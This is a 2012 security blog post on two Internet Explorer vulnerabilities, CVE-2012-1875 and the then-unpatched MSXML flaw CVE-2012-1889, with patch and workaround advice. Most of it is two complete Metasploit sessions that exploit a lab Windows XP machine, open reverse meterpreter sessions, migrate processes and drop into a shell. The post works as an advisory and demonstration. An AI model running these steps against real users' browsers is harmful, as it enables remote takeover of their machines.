A 0-day vulnerability in Microsoft Internet Explorer is reportedly being used in the wild to hijack Gmail accounts. There is already a Metasploit module for the MSXML Uninitialized Memory Corruption vulnerability. As a workaround, users should disable the vulnerable component. Rapid7 also released another module for MS12-037; users should apply the MS patch to fix the vulnerability.
In less than a week after Microsoft issued their Security Advisory 2719615 and the Cumulative Security Update for Internet Explorer MS12-037, Rapid7 released two metasploit modules for the vulnerabilities.
A day later, they updated the msxml_get_definition_code_exec, and now the exploit works on all versions of Internet Explorer for Windows XP, Vista and Windows 7 (SP1).
Reportedly, the MSXML Uninitialized Memory Corruption vulnerability is actively being used in the wild to hijack Gmail accounts.
Currently, there is no patch for this vulnerability. As a workaround, Microsoft suggests disabling the vulnerable component.
As for MS12-037, the users should apply the Microsoft update to fix the vulnerability.
We at websecuritywatch.com tried the two metasploit modules, and they work like a charm.
Here is how the module for MS12-037 works against MS Windows XP (SP3) system:
msf > use exploit/windows/browser/ms12_037_same_id
msf exploit(ms12_037_same_id) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms12_037_same_id) > set lhost 192.168.1.11 lhost => 192.168.1.11 msf exploit(ms12_037_same_id) > show targets
Exploit targets:
Id Name -- ---- 0 Automatic 1 IE 8 on Windows XP SP3 with msvcrt ROP 2 IE 8 on Windows XP SP3 with JRE ROP 3 IE 8 on Windows 7 SP1/Vista SP2 with JRE ROP msf exploit(ms12_037_same_id) > exploit [*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.11:4444 [*] Using URL: http://0.0.0.0:8080/AzHa10iWMjV1J6 [*] Local IP: 192.168.1.11:8080/AzHa10iWMjV1J6 [*] Server started. msf exploit(ms12_037_same_id) > [*] 192.168.1.100 ms12_037_same_id - Client requesting: /AzHa10iWMjV1J6 [*] 192.168.1.100 ms12_037_same_id - Using msvcrt ROP [*] 192.168.1.100 ms12_037_same_id - Sending html [*] Sending stage (752128 bytes) to 192.168.1.100 [*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.100:7657) at 2012-06-20 09:55:57 +0300 [*] Session ID 1 (192.168.1.11:4444 -> 192.168.1.100:7657) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (1956) [*] Spawning notepad.exe process to migrate to [+] Migrating to 912 [+] Successfully migrated to process
msf exploit(ms12_037_same_id) > sessions
Active sessions ===============
Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 TRACEWIN\Administrator @ TRACEWIN 192.168.1.11:4444 -> 192.168.1.100:7657 (10.0.2.15)
msf exploit(ms12_037_same_id) > sessions -i 1 [*] Starting interaction with 1...
meterpreter > sysinfo Computer : TRACEWIN OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter >
Fortunately, if you apply the security update, this will not work any more.
The Vulnerability in Microsoft XML Core Services on the other hand is still not patched. Furthermore, it can be exploited as easily as that:
msf > use exploit/windows/browser/msxml_get_definition_code_exec msf exploit(msxml_get_definition_code_exec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(msxml_get_definition_code_exec) > set lhost 192.168.1.11 lhost => 192.168.1.11 msf exploit(msxml_get_definition_code_exec) > show targets
Exploit targets:
Id Name -- ---- 0 Automatic 1 IE 6 on Windows XP SP3 2 IE 7 on Windows XP SP3 3 IE 8 on Windows XP SP3 4 IE 8 with Java 6 on Windows XP SP3 5 IE 8 with Java 6 on Windows 7 SP1/Vista SP2
msf exploit(msxml_get_definition_code_exec) > exploit [*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.11:4444 [*] Using URL: http://0.0.0.0:8080/hxBnxL [*] Local IP: http://192.168.1.11:8080/hxBnxL [*] Server started.
[*] 192.168.1.100 msxml_get_definition_code_exec - Using msvcrt ROP [*] 192.168.1.100 msxml_get_definition_code_exec - 192.168.1.100:47431 - Sending html [*] Sending stage (752128 bytes) to 192.168.1.100 [*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.100:18471) at 2012-06-20 10:34:09 +0300 [*] Session ID 1 (192.168.1.11:4444 -> 192.168.1.100:18471) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (2020) [*] Spawning notepad.exe process to migrate to [+] Migrating to 1852
msf exploit(msxml_get_definition_code_exec) > sessions
Active sessions ===============
Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 TRACEWIN\Administrator @ TRACEWIN 192.168.1.11:4444 -> 192.168.1.100:18471 (10.0.2.15)
[+] Successfully migrated to processing msf exploit(msxml_get_definition_code_exec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo Computer : TRACEWIN OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > shell Process 380 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>exit meterpreter >
Remember, although there is no patch for this vulnerability, you can follow the Microsoft recommendations on how to mitigate it.
External References: Rapid7 Blog, CVE-2012-1889, CVE-2012-1875, Microsoft Security Advisory (2719615), Microsoft Security Bulletin MS12-037, MSXML: Fix it before fixing it
The post 0-Day Vulnerabilities in Microsoft Internet Explorer appeared first on Web Security Watch.